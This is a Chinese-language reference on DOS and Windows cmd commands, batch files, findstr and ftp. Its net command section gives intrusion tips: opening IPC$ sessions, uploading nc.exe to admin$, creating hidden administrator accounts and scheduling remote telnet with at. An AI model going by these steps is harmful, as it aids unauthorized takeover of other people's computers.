From：https://www.douban.com/note/185257401/

DOS 在線手冊：http://www.shouce.ren/api/dos/

DOS W3School 教程：https://www.w3cschool.cn/dosmlxxsc1/

http://wenku.baidu.com/view/5ecce91452d380eb62946da8.html
http://wenku.baidu.com/view/1a343421a5e9856a56126014.html
http://wenku.baidu.com/view/4a5430eaaeaad1f346933f8e.html

? ? ? ? DOS 下的可執行文件有三種，分別是 EXE，COM，BAT?和 cmd 。其中，EXE 和 COM 文件都是二進制形式的，只有 BAT文件是文本形式的，可以直接閱讀。因此，BAT 文件 和 以上 二進制 可執行文件相比，內容要簡單的多。這些文件內包含著 DOS 命令的集合，通常 叫作 批處理文件。批處理文件的組成雖然比較簡單，但其用處非常大，使用也比較廣泛。比如每次都執行一些相同的命令，您一定會覺得非常麻煩，而放在批處理文件中執行的話則輕松得多。AUTOEXEC.BAT 就是一個特殊的批處理文件，它在 DOS 的啟動時自動運行，在系統的配置中發揮著非常大的作用。因此，要學好 DOS，就要學好批處理文件。下面介紹批處理文件的命令及其使用。?

windows 下 cmd 命令行顯示 UTF8 字符設置 (CHCP命令)：https://jingyan.baidu.com/article/f7ff0bfcee2dc22e26bb13d5.html

• chcp 65001? ? UTF-8
• chcp 936? ? ? ? 默認的GBK
• chcp 437? ? ? ?美國英語 ?

DOS命令

DOS 中是通過輸入英文命令加回車鍵這種方式來執行程序的，DOS 稱為單任務的操作系統。

只要后綴為 exe、com 或 bat 的文件都是可以直接執行的。（?要執行這些文件，只需在提示符下敲入文件基本名然后回車即可，不需輸入文件后綴。 ）

• 以 exe 為后綴的文件叫 可執行文件；
• 以 com 為后綴的文件叫 命令文件；
• 以 bat 為后綴的文件叫 批處理文件。所謂批處理，就是一下可以執行很多條命令，當想要完成一系列任務時，可以一個一個命令的執行，也可以將這些命令都裝入一個文件中，只要敲一下這個文件名，電腦就會將這一批命令一次執行完畢。

在 DOS 中，有個 當前目錄 的概念，就是 提示符所顯示的目錄，現在的提示符是 C:\，那么當前目錄就是 C 盤的根目錄，這個 \ (反斜杠) 就表示根目錄。

DOS命令分為 內部命令 和 外部命令。（?內部命令在任何時候都可以使用，而外部命令需要保證命令文件在當前的目錄中，或在Autoexec.bat 文件已經被加載了路徑。 ）

• 內部命令：是隨每次啟動的 COMMAND.COM 裝入并常駐內存。常用的內部命令有：md (創建目錄)、cd (改變目錄)、rd (刪除目錄)、dir (顯示目錄內容)、path (設置路徑)、copy (文件復制)、type (顯示文件內容)、edit (編輯)、ren (重命名)、del (刪除文件)、cls (清屏)、ver (查看系統版本號)、date (日期)、time (時間)、prompt (改變提示符)。
• 外部命令：是一個單獨的可執行文件。常用的外部命令有：deltree (刪除整個目錄命令)、format (磁盤格式化)、diskcopy (整盤復制)、label (建立磁盤卷標)、vol (顯示磁盤卷標)、sys (系統復制)、xcopy (目錄復制)、fc (文件比較)、attrib (修改文件屬性)、mem、tree (顯示目錄結構)。

部分命令說明

1．MD——建立子目錄功能：創建新的子目錄類型：內部命令格式：MD[盤符：][路徑名]〈子目錄名〉示例：C:\>md y /*---建立y子目錄---*/ 2．CD——改變當前目錄功能：顯示當前目錄類型：內部命令格式：CD[盤符：][路徑名][子目錄名]說明：CD命令不能改變當前所在的盤，CD..退回到上一級目錄，CD\表示返回到當前盤的目錄下，CD無參數時顯示當前目錄名。示例：C:\>cd y /*---顯示當前目錄y---*/ 3．RD——刪除子目錄命令功能：從指定的磁盤刪除了目錄。類型：內部命令格式：RD[盤符：][路徑名][子目錄名]示例：C:\>rd y 4．DIR——顯示磁盤目錄命令功能：顯示磁盤目錄的內容。類型：內部命令格式：DIR [盤符][路徑][/P][/W]示例：C:\>dir y 5．PATH——路徑設置命令功能：設備可執行文件的搜索路徑，只對文件有效。類型：內部命令格式：PATH[盤符1]目錄[路徑名1]{[；盤符2：]，〈目錄路徑名2〉…}C:\>pathPATH=C:\WINDOWS;C:\WINDOWS\COMMAND;C:\PROGRAMFILES\MTS 6．COPY文件復制命令功能：拷貝一個或多個文件到指定盤上。類型：內部命令格式：COPY [源盤][路徑]〈源文件名〉[目標盤][路徑][目標文件名]C:\>copy yyy.txt yyy1 file(s) copiedC:\yyy>dir yyy說明： 如果是將多個文件復制到一個新的文件，命令 COPY [源盤][路徑]〈源文件A〉+[源盤][路徑]〈源文件B〉[目標盤][路徑][目標文件名]C:\>copy x.txt+y.txt xy.t 7．TYPE——顯示文件內容命令功能：顯示ASCII碼文件的內容.類型：內部命令。格式：TYPE[盤符：][路徑]〈文件名〉C:\>trpe yyy.txt /*---假設C盤目錄下存在yyy.txt文件---*/ 8．EDIT——編輯文件內容命令功能：編輯ASCII文件的內容，也可建立一個新文件。類型：內部命令。EDIT[盤符：][路徑]〈文件名〉說明： EDIT即可以編輯ASCII文件的內容，也可以新建立一個文件，他們的擴展名命名方式也很靈活，比如.txt、.bat,甚至可以編輯.c、.bas的格式。 C:\>edit /*進入編輯模式*/C:\>edit yyy.txt /*---編輯yyy.txt文件的內容，如果要選擇支持中文格式，應該安裝UCDOS---*/ 9．REN——文件改名命令功能：更改文件名稱類型：內部命令格式：REN[盤符：][路徑]〈舊文件名〉〈新文件名〉C:\>ren yyy.txt cly.txt 10．DEL——刪除文件命令功能：刪除指定的文件。類型：內部命令格式：DEL[盤符：][路徑]〈文件名〉[/P]說明：選用/P參數，系統在刪除前詢問是否真要刪除該文件，若不使用這個參數，則自動刪除。 11．CLS——清屏幕命令功能：清除屏幕上的所有顯示，光標置于屏幕左上角。類型：內部命令格式：CLSC:\>CLS 12．VER查看系統版本號命令功能：顯示當前系統版本號類型：內部命令格式：VER C:\>VER 13．DATA日期設置命令功能：設置或顯示系統日期。類型：內部命令格式：DATE[mm—dd—yy] C:\>DATECurrent date is Sun 11-23-2Enter new date (mm-dd-yy): /*---提示你輸入新的日期---*/ 14．TIME系統時鐘設置命令功能：設置或顯示系統時期。類型：內部命令格式：TIME[hh：mm：ss：xx] C:\>timeCurrent time is 22:49:28.81Enter new time: 15．PROMPT：更改命令提示符功能：改變DOS系統提示符的風格。 16. deltree--刪除目錄樹 [格式] [C:][path]DELTREE [C1:][path1] [[C2:][path2] […]] 17. mem--查看你的計算機內存有多少，以及內存的使用情況。 [格式] 直接鍵入mem命令 18. chkdsk--檢查你的磁盤的使用情況。 [格式] chkdsk 磁盤名 21. FORMAT（Format.COM）--格式化命令 格式為"FORMAT [盤符] [參數]"，例如："FORMAT A: /S"。它有兩個常見的參數： /Q：進行快速格式化； /S：完成格式化，并將系統引導文件拷貝到該磁盤。 22. FDISK（Fdisk.EXE）--分區命令

windows 運行命令全集

有關某個命令的詳細信息，請鍵入 HELP 命令名winver檢查Windows版本 dxdiag檢查DirectX信息 mem.exe顯示內存使用情況 Sndvol32音量控制程序 sfc.exe系統文件檢查器 gpedit.msc 組策略 regedit.exe 注冊表 Msconfig.exe 系統配置實用程序 cmd.exe CMD命令提示符 chkdsk.exe Chkdsk磁盤檢查 mem.exe顯示內存使用情況 gpedit.msc 組策略 regedit.exe 注冊表 Msconfig.exe 系統配置實用程序 cmd.exe CMD命令提示符 services.msc 服務 lusrmgr.msc 本地賬戶管理 drwtsn32 系統醫生 cleanmgr 垃圾整理 iexpress 木馬捆綁工具，系統自帶 mmc 控制臺 dcpromo 活動目錄安裝 ntbackup 系統備份和還原 rononce -p 15秒關機 taskmgr 任務管理器 conf 啟動netmeeting devmgmt.msc 設備管理器 diskmgmt.msc NT的磁盤管理器 compmgmt.msc 計算機管理 winchat 局域網聊天 dvdplay DVD播放器 mplayer2 簡易widnows media player mspaint 畫圖板 nslookup 網絡管理的工具 syskey 系統加密，一旦加密就不能解開，保護windows xp系統的雙重密碼 wupdmgr WIDNOWS UPDATE Clipbrd 剪貼板查看器 Odbcad32 ODBC數據源管理器 Nslookup IP地址偵測器XP.CMD命令大全有關某個命令的詳細信息，請鍵入 HELP 命令名 ASSOC 顯示或修改文件擴展名關聯。 AT 計劃在計算機上運行的命令和程序。 ATTRIB 顯示或更改文件屬性。 BREAK 設置或清除擴展式 CTRL+C 檢查。 CACLS 顯示或修改文件的訪問控制列表(ACLs)。 CALL 從另一個批處理程序調用這一個。 CD 顯示當前目錄的名稱或將其更改。 CHCP 顯示或設置活動代碼頁數。 CHDIR 顯示當前目錄的名稱或將其更改。 CHKDSK 檢查磁盤并顯示狀態報告。 CHKNTFS 顯示或修改啟動時間磁盤檢查。 CLS 清除屏幕。 CMD 打開另一個 Windows 命令解釋程序窗口。 COLOR 設置默認控制臺前景和背景顏色。 COMP 比較兩個或兩套文件的內容。 COMPACT 顯示或更改 NTFS 分區上文件的壓縮。 CONVERT 將 FAT 卷轉換成 NTFS。您不能轉換當前驅動器。 COPY 將至少一個文件復制到另一個位置。 DATE 顯示或設置日期。 DEL 刪除至少一個文件。 DIR 顯示一個目錄中的文件和子目錄。 DISKCOMP 比較兩個軟盤的內容。 DISKCOPY 將一個軟盤的內容復制到另一個軟盤。 DOSKEY 編輯命令行、調用 Windows 命令并創建宏。 ECHO 顯示消息，或將命令回顯打開或關上。 ENDLOCAL 結束批文件中環境更改的本地化。 ERASE 刪除至少一個文件。 EXIT 退出 CMD.EXE 程序(命令解釋程序)。 FC 比較兩個或兩套文件，并顯示不同處。 FIND 在文件中搜索文字字符串。 FINDSTR 在文件中搜索字符串。 FOR 為一套文件中的每個文件運行一個指定的命令。 FORMAT 格式化磁盤，以便跟 Windows 使用。 FTYPE 顯示或修改用于文件擴展名關聯的文件類型。 GOTO 將 Windows 命令解釋程序指向批處理程序中某個標明的行。 GRAFTABL 啟用 Windows 來以圖像模式顯示擴展字符集。 HELP 提供 Windows 命令的幫助信息。 IF 執行批處理程序中的條件性處理。 LABEL 創建、更改或刪除磁盤的卷標。 MD 創建目錄。 MKDIR 創建目錄。 MODE 配置系統設備。 MORE 一次顯示一個結果屏幕。 MOVE 將文件從一個目錄移到另一個目錄。 PATH 顯示或設置可執行文件的搜索路徑。 PAUSE 暫停批文件的處理并顯示消息。 POPD 還原 PUSHD 保存的當前目錄的上一個值。 PRINT 打印文本文件。 PROMPT 更改 Windows 命令提示符。 PUSHD 保存當前目錄，然后對其進行更改。 RD 刪除目錄。 RECOVER 從有問題的磁盤恢復可讀信息。 REM 記錄批文件或 CONFIG.SYS 中的注釋。 REN 重命名文件。 RENAME 重命名文件。 REPLACE 替換文件。 RMDIR 刪除目錄。 SET 顯示、設置或刪除 Windows 環境變量。 SETLOCAL 開始批文件中環境更改的本地化。 SHIFT 更換批文件中可替換參數的位置。 SORT 對輸入進行分類。 START 啟動另一個窗口來運行指定的程序或命令。 SUBST 將路徑跟一個驅動器號關聯。 TIME 顯示或設置系統時間。 TITLE 設置 CMD.EXE 會話的窗口標題。 TREE 以圖形模式顯示驅動器或路徑的目錄結構。 TYPE 顯示文本文件的內容。 VER 顯示 Windows 版本。 VERIFY 告訴 Windows 是否驗證文件是否已正確寫入磁盤。 VOL 顯示磁盤卷標和序列號。 XCOPY 復制文件和目錄樹

DOS?中 find 和 findstr 命令

參考：http://www.jb51.net/article/29239.htm

dos 中的 find 命令

find 幫助。C:\>find /?

C:\>find /? 在文件中搜索字符串。FIND [/V] [/C] [/N] [/I] [/OFF[LINE]] "string" [[drive:][path]filename[ ...]]/V 顯示所有未包含指定字符串的行。/C 僅顯示包含字符串的行數。/N 顯示行號。/I 搜索字符串時忽略大小寫。/OFF[LINE] 不要跳過具有脫機屬性集的文件。"string" 指定要搜索的文本字符串。[drive:][path]filename指定要搜索的文件。如果沒有指定路徑，FIND 將搜索在提示符處鍵入 的文本或者由另一命令產生的文本。

find 使用示例：

find "abc" d:\abc.txt //在abc.txt中搜索包含字符串abc的行 find /i "abc" d:\abc.txt //搜索時忽略大小寫 find /n "abc" d:\abc.txt //顯示行號 find /c "abc" d:\abc.txt // /c是英文單詞 count(計數)的縮寫。統計行數 find /v "abc" d:\abc.txt // 顯示 不包含 abc 的行。

dos 中的 findstr 命令

findstr 是 find 的擴展，功能更強大。findstr，全英文find string，意為“查找字符串”

FINDSTR [/B] [/E] [/L] [/R] [/S] [/I] [/X] [/V] [/N] [/M] [/O] [/P] [/F:file] [/C:string] [/G:file] [/D:dir list] [/A:color attributes] [/OFF[LINE]] strings [[drive:][path]filename[ ...]] /B 在一行的開始配對模式。 /E 在一行的結尾配對模式。 /L 按字面意思搜索字符串。 /R 將搜索字符串作為正則表達式使用。 /S 在當前目錄和所有子目錄中搜索匹配文件。 /I 指定搜索不分大小寫。 /X 打印完全匹配的行。 /V 只打印不包含匹配的行。 /N 在匹配的每行前打印行數。 /M 如果文件含有匹配項，只打印其文件名。 /O 在每個匹配行前打印字符偏移量。 /P 忽略有不可打印字符的文件。 /OFF[LINE] 不跳過帶有脫機屬性集的文件。 /A:attr 指定有十六進位數字的顏色屬性。請見 "color /?" /F:file 從指定文件讀文件列表 (/ 代表控制臺)。 /C:string 使用指定字符串作為文字搜索字符串。 /G:file 從指定的文件獲得搜索字符串。 (/ 代表控制臺)。 /D:dir 查找以分號為分隔符的目錄列表 strings 要查找的文字。 [drive:][path]filename 指定要查找的文件。 除非參數有 /C 前綴，請使用空格隔開搜索字符串。 例如: 'FINDSTR "hello there" x.y' 在文件 x.y 中尋找 "hello" 或 "there"。'FINDSTR /C:"hello there" x.y' 文件 x.y 尋找 "hello there"。 正則表達式的快速參考: . 通配符: 任何字符 * 重復: 以前字符或類出現零或零以上次數 ^ 行位置: 行的開始 $ 行位置: 行的終點 [class] 字符類: 任何在字符集中的字符 [^class] 補字符類: 任何不在字符集中的字符 [x-y] 范圍: 在指定范圍內的任何字符 \x Escape: 元字符 x 的文字用法 \<xyz 字位置: 字的開始 xyz\> 字位置: 字的結束 例子： \<hello\> // 精確 匹配 hello，即只匹配 hello 這個單詞

命令概括： findstr，全英文find string，意為“查找字符串”；

命令概括： findstr，全英文find string，意為“查找字符串”； /b，全英文begin，意為“開始”； /e，全英文end，意為“末端”； /l，literally，意為“照字面地”；引申為“去正則表達式”。 /r,regular，意為“有規律的”；引申為“正則表達式”。 /s，subdirectory，意為“子目錄”； /i，ignore，意為“忽略”；引申為“忽略大小寫”； /x，exactly，意為“恰好地”；引申為“完全匹配”；（一開始意為不是這個單詞，不過 HAT 確實高明——之所以以e為縮寫，是因為前面有了end的縮寫，所以以第二個字母x為縮寫）。 /v，invert，意為“反轉、使顛倒”（感謝doupip的單詞提供）； /n，全英文number，意為“數字”；引申為“行號”； /m，merely，意為“只是”； /o,offset，意為“偏移”； /p，print，意為“打印”； /off[line]，意為“脫機文件”； /a，attribute，意為“屬性”； /f，file，意為“文件”； /c，case，意為“把幾個字加起來”；引申為“全部字匹配”； /g，get，意為“獲得”； /d，directory，意為“目錄”； class，類。

學習 findstr 需要大量的實踐體會，所以需要新建一些 txt 文本以供測試。

a.txt 的內容（a.txt的內容在后面會多次修改，請注意！）：

Hello World Hello Boy hello ,good man. goodbye!

findstr 使用示例：

findstr "hello" a.txt findstr "Hello" a.txt findstr默認是區分大小寫的（跟find命令一樣）用/i參數可以忽略大小寫。 findstr /i "Hello" a.txt //忽略大小寫 findstr /n /i "hello" a.txt //查找在那一行 find /n "hello" a.txt findstr /m /i "hello" *.txt //加上/m參數，只列出包含指定字符的文件名。 findstr /b /i "hello" a.txt //查找以hello（忽略大小寫）開始的行 findstr /i "^hello" a.txt findstr /i "hello$" a.txt findstr /n /i "^hello$" a.txt findstr /n /i /x "hello" a.txt // /x參數用來查找完全匹配的行。// /l參數后，findstr轉換為“普通字符串模式”（其實find就是這種模式、且只有這種模式）。不能再使用正則表達式。 findstr /li "hello" a.txt

find 比 findstr 更強的地方：

• 1、統計含指定字符串的總行數。find /c "abc" test.txt 可以統計 test.txt 中含有字符串 abc 的總行數，而 findstr 則沒有直接提供該功能，需要配合for語句才能實現；
• 2、find 可以讀取 Unicode 格式的文本，而 findstr 則不行；
• 3、find 可以過濾某些特殊字符，而 findstr 則不行，比如，我們在使用 fsutil fsinfo drives 語句查詢磁盤分區的時候，如果想讓盤符分行顯示而不是顯示在同一行上的時候（這在用 for 語句提取盤符的時候很有用），find 可以大顯身手，而 findstr 只能干瞪眼了，具體語句為： 代碼: fsutil fsinfo drives|find /v ""

必知的 10 個?DOS 命令集合

ping

? ? ? ? 檢查網絡是否通暢或者網絡連接速度的命令。ping命令是第一個必須掌握的DOS命令，原理:網絡上的機器都有唯一確定的IP地址，我們給目標IP地址發送一個數據包，對方就要返回一個同樣大小的數據包，根據返回的數據包我們可以確定目標主機的存在，可以初步判斷目標主機的操作系統等。下面就來看看它的一些常用的操作。先看看幫助吧，在DOS窗口中鍵入:ping /? 回車，出現如圖1所示的幫助畫面。在此，我們只掌握一些基本的很有用的參數就可以了(下同)。

nbtstat

該命令使用 TCP/IP 上的 NetBIOS 顯示協議統計和當前 TCP/IP 連接，使用這個命令你可以得到遠程主機的 NETBIOS 信息，比如 用戶名、所屬的工作組、網卡的 MAC 地址等??

netstat

查看網絡狀態的命令，操作簡便功能強大。

Windows 中結束占用某個端口的進程（ 假設 8080 端口被占用，現在結束使用8080端口的進程??）：

• 1. 打開 cmd 命令窗口，輸入命令：netstat -ano | findstr 8080，根據端口號查找對應的PID。

  ? ? ? 發現 8080 端口被 PID（進程號）為 2188 的進程占用。

• 2.?根據PID找進程名稱，輸入命令：tasklist | findstr 2188，發現是占用 8080 端口的進程為：javaw.exe。

• 3.?根據PID結束對應進程。輸入命令taskkill -PID 2188 -F，強制關閉 PID 為 2188 的進程。

tracert

跟蹤路由信息，使用此命令可以查出數據從本地機器傳輸到目標主機所經過的所有途徑，這對我們了解網絡布局和結構很有幫助。如圖5，這里說明數據從本地機器傳輸到192.168.0.1的機器上，中間沒有經過任何中轉，說明這兩臺機器是在同一段局域網內。用法:tracert IP。

net

NET 指令是一個由眾多命令作為參數組成的龐大命令集，其語法是：

net [ accounts | computer | config | continue | file | group | help | helpmsg | localgroup | name | pause | print | send | session | share | start | statistics | stop | time | use | user | view ]

所有 net 命令接受選項 / yes 和 /no（可縮寫為 / y 和 /n ）。

• / y 對命令產生的任何交互提示自動回答“是”。
• /n 回答“否”。

例如，net stop server 通常提示確認是否根據服務器服務結束所有服務，net stop server /y 自動回答“是”并關閉服務器服務。這個命令是網絡命令中最重要的一個，必須透徹掌握它的每一個子命令的用法，因為它的功能實在是太強大了，這簡直就是微軟為我們提供的最好的入侵工具。首先讓我們來看一看它都有那些子命令，鍵入net /?回車。

net view

使用此命令查看遠程主機的所以共享資源。命令格式為 net view \\IP

NET VIEW 命令 用于顯示一個計算機上共享資源的列表。當不帶選項使用本命令時，它就會顯示當前域或工作組中計算機的列表。其命令格式如下:

NET VIEW [\\computername [/CACHE] | [/ALL] | /DOMAIN[:domainname]] 或? NET?VIEW?/NETWORK:NW?[\\computername]\\Computername 指定希望查看其共享資源的目標計算機。/domain[:domainname] 指定要查看其可用計算機的域或工作組。如果省略 DomainName，/domain 將顯示網絡上的所有域或工作組名。/network:nw 顯示 NetWare 網絡上所有可用的服務器。如果指定計算機名，/network:nw 將通過 NetWare 網絡顯示該計算機上的可用資源。也可以指定添加到系統中的其他網絡。

使用 net view 命令顯示計算機列表。輸出內容與以下相似:

服務器名稱 注釋-------------------------------------------------?//Production?Production?file?server?//Print1?Printer?room,?first?floor?//Print2?Printer?room,?second?floor

下面是一些 net view 命令的使用范例：

net?view?//production 查看 //Production 計算機共享的資源列表 net?view?/network:nw?//marketing 查看 NetWare 服務器 //Marketing 上的可用資源 net?view?/domain:sales 查看 sale 域或工作組中的計算機列表 net?view?/network:nw 查看 NetWare 網絡中的所有服務器

net use

把遠程主機的某個共享資源影射為本地盤符，圖形界面方便使用。命令格式為net use x: \\IP\sharename。

上面一個表示把192.168.0.5IP的共享名為magic的目錄影射為本地的Z盤。

下面表示和192.168.0.7建立IPC$連接(net use \\IP\IPC$ "password" /user:"name")，

建立了IPC$連接后，就可以上傳文件了:copy nc.exe \\192.168.0.7\admin$，表示把本地目錄下的nc.exe傳到遠程主機，結合后面要介紹到的其他DOS命令就可以實現入侵了。

net share

NET SHARE 用于管理共享資源，使網絡用戶可以使用某一服務器上的資源。
當不帶選項使用此命令時，它會列出該計算機上正在被共享的所有資源。
對于每一種資源，Windows 都會報告其設備名或路徑名，以及與之相關的描述性注釋。

參數 和 使用示例：

參數 ShareName指定共享資源的網絡名稱。鍵入帶參數 ShareName 的 net share 命令僅顯示有關該共享的信息。 drive:path指定要共享目錄的絕對路徑。 /users:number設置可以同時訪問共享資源的最多用戶數。 /unlimited指定可以同時訪問共享資源的、數量不受限制的用戶。 /remark:"text" 添加關于資源的描述注釋。給文本加上引號。 /cache:automatic啟用帶自動重新集成的脫機客戶緩存。 /cache:manual啟用帶手動重新集成的脫機客戶緩存。 /cache:no提醒客戶脫機緩存不合適。 /delete停止共享資源。 net help command顯示指定 net 命令的幫助。 注釋要共享帶有包含空格字符路徑的目錄，請使用引號將目錄的驅動器和路徑引起來（例如， "C:\Path Name"）。當顯示計算機上的所有共享資源時，將顯示資源的共享名、與資源相關的設備名或路徑，以及與資源有關的描述性注釋。輸出內容與以下相似：share name resource remark ------------------------------------------------------ ADMIN$ C:\WINNT Remote Admin C$ C:\ Default Share for Internal Use print$ C:\WINNT\SYSTEM\SPOOL IPC$ Remote IPC LASER LPT1 Spooled Laser printer在服務器上創建共享時，這些共享將被保存。 在停止 Server 服務時，所有共享都斷開，但是在下一次啟動 Server 服務或者重新啟動計算機時將自動重新連接它們。 有關服務的詳細信息，請參閱服務。 當從遠程計算機瀏覽本地計算機時，將不顯示以字符 $ 結尾的共享資源名。 范例 要顯示有關計算機上共享資源的信息，請鍵入： 網絡共享 要使用共享名 DataShare 共享計算機的 C:\Data 目錄并包括注釋，請鍵入： net share DataShare=c:\Data /remark:"For department 123." 要停止上例中創建的 DataShare 文件夾共享，請鍵入： net share DataShare /delete 要使用共享名 List 共享計算機的 C:\Art Lst 目錄，請鍵入： net share list="c:\art lst" ============================================================================================ 測試實例: \\172.168.68.191上添加共享名:D:\config>net share app$=d:\configapp$ 共享成功。\\172.168.68.177機器執行copy命令: D:\>net use \\172.168.68.191\app$ "ffcs" /user:"administrator" 命令成功完成。D:\>copy \\172.168.68.191\app$\php.ini d:\copy 已復制 1 個文件。 D:\>cd copy D:\copy>dir

現在已經接觸了 net view，net use，net share 這三個命令，可以用這三個命令來完成大部分 windows 網絡共享相關的工作，

• 可以 用 net view 命令在網絡上查找共享資源，
• 用 net use命令使用指定的共享資源并用
• 用 net share 命令向網絡添加共享資源。

net start / stop

啟動/停止 本地主機或者遠程主機上的服務。當你和遠程主機建立連接后，如果發現它的什么服務沒有啟動，而你又想利用此服務怎么辦?就使用這個命令來啟動吧。

用法:net start servername

net user

查看和帳戶有關的情況，包括新建帳戶、刪除帳戶、查看特定帳戶、激活帳戶、帳戶禁用等。這對我們入侵是很有利的，最重要的，它為我們克隆帳戶提供了前提。鍵入不帶參數的net user，可以查看所有用戶，包括已經禁用的。下面分別講解。

net user abcd 1234 /add，新建一個用戶名為abcd，密碼為1234的帳戶，默認為user組成員。 net user abcd /del，將用戶名為abcd的用戶刪除。 net user abcd，查看用戶名為abcd的用戶的情況。 net user abcd /active:no，將用戶名為abcd的用戶禁用。 net user abcd /active:yes，激活用戶名為abcd的用戶。net localgroup 查看所有和用戶組有關的信息和進行相關操作。鍵入不帶參數的net localgroup即列出當前所有的用戶組。 在入侵過程中，我們一般利用它來把某個帳戶提升為administrator組帳戶，這樣我們利用這個帳戶就可以控制整個遠程主機了。 用法:net localgroup groupname username /add，

現在我們把剛才新建的用戶abcd加到administrator組里去了，這時候abcd用戶已經是超級管理員了。你可以再使用 net u ser abcd來查看他的狀態。但這樣太明顯了，網管一看用戶情況就能漏出破綻，所以這種方法只能對付菜鳥網管，但我們還得知道。現在的手段都是利用其他工具和手段克隆一個讓網管看不出來的超級管理員，這是后話。有興趣的朋友可以參照《黑客防線》第30期上的《由淺入深解析隆帳戶》一文。

net time

查看遠程主機當前的時間。如果你的目標只是進入到遠程主機里面，那么也許就用不到這個命令了。但簡單的入侵成功了，難道只是看看嗎?我們需要進一步滲透。這就連遠程主機當前的時間都需要知道，因為利用時間和其他手段(后面會講到)可以實現某個命令和程序的定時啟動，為我們進一步入侵打好基礎。用法:net time \\IP。

at

這個命令的作用是安排在特定日期或時間執行某個特定的命令和程序(知道net time的重要了吧?)。

當我們知道了遠程主機的當前時間，就可以利用此命令讓其在以后的某個時間(比如2分鐘后)執行某個程序和命令。

用法:at time command \\computer。如圖：表示在6點55分時，讓名稱為a-01的計算機開啟telnet服務(這里net start telnet即為開啟telnet服務的命令)。

ftp

FTP命令詳解：
FTP命令是Internet用戶使用最頻繁的命令之一
熟悉并靈活應用FTP的內部命令，可以大大方便使用者，并收到事半功倍之效。
如果你想學習使用進行后臺FTP下載，那么就必須學習FTP指令。?

FTP的命令行格式為： ftp -v -d -i -n -g [主機名] ，其中 -v 顯示遠程服務器的所有響應信息 -n 限制ftp的自動登錄，即不使用；.n etrc文件； -d 使用調試方式； -g 取消全局文件名。 FTP使用的內部命令如下(中括號表示可選項): 1.![cmd[args]]：在本地機中執行交互shell，exit回到ftp環境，如：!ls*.zip 2.$ macro-ame[args]： 執行宏定義macro-name。 3.account[password]： 提供登錄遠程系統成功后訪問系統資源所需的補充口令。 4.append local-file[remote-file]：將本地文件追加到遠程系統主機，若未指定遠程系統文件名，則使用本地文件名。 5.ascii：使用ascii類型傳輸方式。 6.bell：每個命令執行完畢后計算機響鈴一次。 7.bin：使用二進制文件傳輸方式。 8.bye：退出ftp會話過程。 9.case：在使用mget時，將遠程主機文件名中的大寫轉為小寫字母。 10.cd remote-dir：進入遠程主機目錄。 11.cdup：進入遠程主機目錄的父目錄。 12.chmod mode file-name：將遠程主機文件file-name的存取方式設置為mode，如：chmod 777 a.out。 13.close：中斷與遠程服務器的ftp會話(與open對應)。 14.cr：使用asscii方式傳輸文件時，將回車換行轉換為回行。 15.delete remote-file：刪除遠程主機文件。 16.debug[debug-value]：設置調試方式， 顯示發送至遠程主機的每條命令，如：deb up 3，若設為0，表示取消debug。 17.dir[remote-dir][local-file]：顯示遠程主機目錄，并將結果存入本地文件。 18.disconnection：同close。 19.form format：將文件傳輸方式設置為format，缺省為file方式。 20.get remote-file[local-file]： 將遠程主機的文件remote-file傳至本地硬盤的local-file。 21.glob：設置mdelete，mget，mput的文件名擴展，缺省時不擴展文件名，同命令行的-g參數。 22.hash：每傳輸1024字節，顯示一個hash符號(#)。 23.help[cmd]：顯示ftp內部命令cmd的幫助信息，如：help get。 24.idle[seconds]：將遠程服務器的休眠計時器設為[seconds]秒。 25.image：設置二進制傳輸方式(同binary)。 26.lcd[dir]：將本地工作目錄切換至dir。 27.ls[remote-dir][local-file]：顯示遠程目錄remote-dir， 并存入本地文件local-file。 28.macdef macro-name：定義一個宏，遇到macdef下的空行時，宏定義結束。 29.mdelete[remote-file]：刪除遠程主機文件。 30.mdir remote-files local-file：與dir類似，但可指定多個遠程文件，如 ：mdir *.o.*.zipoutfile 。 31.mget remote-files：傳輸多個遠程文件。 32.mkdir dir-name：在遠程主機中建一目錄。 33.mls remote-file local-file：同nlist，但可指定多個文件名。 34.mode[modename]：將文件傳輸方式設置為modename， 缺省為stream方式。 35.modtime file-name：顯示遠程主機文件的最后修改時間。 36.mput local-file：將多個文件傳輸至遠程主機。 37.newer file-name： 如果遠程機中file-name的修改時間比本地硬盤同名文件的時間更近，則重傳該文件。 38.nlist[remote-dir][local-file]：顯示遠程主機目錄的文件清單，并存入本地硬盤的local-file。 39.nmap[inpattern outpattern]：設置文件名映射機制， 使文件傳輸時，文件中的某些字符相互轉換， 如：nmap $1.$2.$3[$1，$2].[$2，$3]，則傳輸文件a1.a2.a3時，文件名變為a1，a2。 該命令特別適用于遠程主機為非UNIX機的情況。 40.ntrans[inchars[outchars]]：設置文件名字符的翻譯機制，如ntrans1R，則文件名LLL將變為RRR。 41.open host[port]：建立指定ftp服務器連接，可指定連接端口。 42.passive：進入被動傳輸方式。 43.prompt：設置多個文件傳輸時的交互提示。 44.proxy ftp-cmd：在次要控制連接中，執行一條ftp命令， 該命令允許連接兩個ftp服務器，以在兩個服務器間傳輸文件。第一條ftp命令必須為open，以首先建立兩個服務器間的連接。 45.put local-file[remote-file]：將本地文件local-file傳送至遠程主機。 46.pwd：顯示遠程主機的當前工作目錄。 47.quit：同bye，退出ftp會話。 48.quote arg1，arg2...：將參數逐字發至遠程ftp服務器，如：quote syst. 49.recv remote-file[local-file]：同get。 50.reget remote-file[local-file]：類似于get， 但若local-file存在，則從上次傳輸中斷處續傳。 51.rhelp[cmd-name]：請求獲得遠程主機的幫助。 52.rstatus[file-name]：若未指定文件名，則顯示遠程主機的狀態， 否則顯示文件狀態。 53.rename[from][to]：更改遠程主機文件名。 54.reset：清除回答隊列。 55.restart marker：從指定的標志marker處，重新開始get或put，如：restart 130。 56.rmdir dir-name：刪除遠程主機目錄。 57.runique：設置文件名只一性存儲，若文件存在，則在原文件后加后綴.1， .2等。 58.send local-file[remote-file]：同put。 59.sendport：設置PORT命令的使用。 60.site arg1，arg2...：將參數作為SITE命令逐字發送至遠程ftp主機。 61.size file-name：顯示遠程主機文件大小，如：site idle 7200。 62.status：顯示當前ftp狀態。 63.struct[struct-name]：將文件傳輸結構設置為struct-name， 缺省時使用stream結構。 64.sunique：將遠程主機文件名存儲設置為只一(與runique對應)。 65.system：顯示遠程主機的操作系統類型。 66.tenex：將文件傳輸類型設置為TENEX機的所需的類型。 67.tick：設置傳輸時的字節計數器。 68.trace：設置包跟蹤。 69.type[type-name]：設置文件傳輸類型為type-name，缺省為ascii，如:type binary，設置二進制傳輸方式。 70.umask[newmask]：將遠程服務器的缺省umask設置為newmask，如：umask 3 71.user 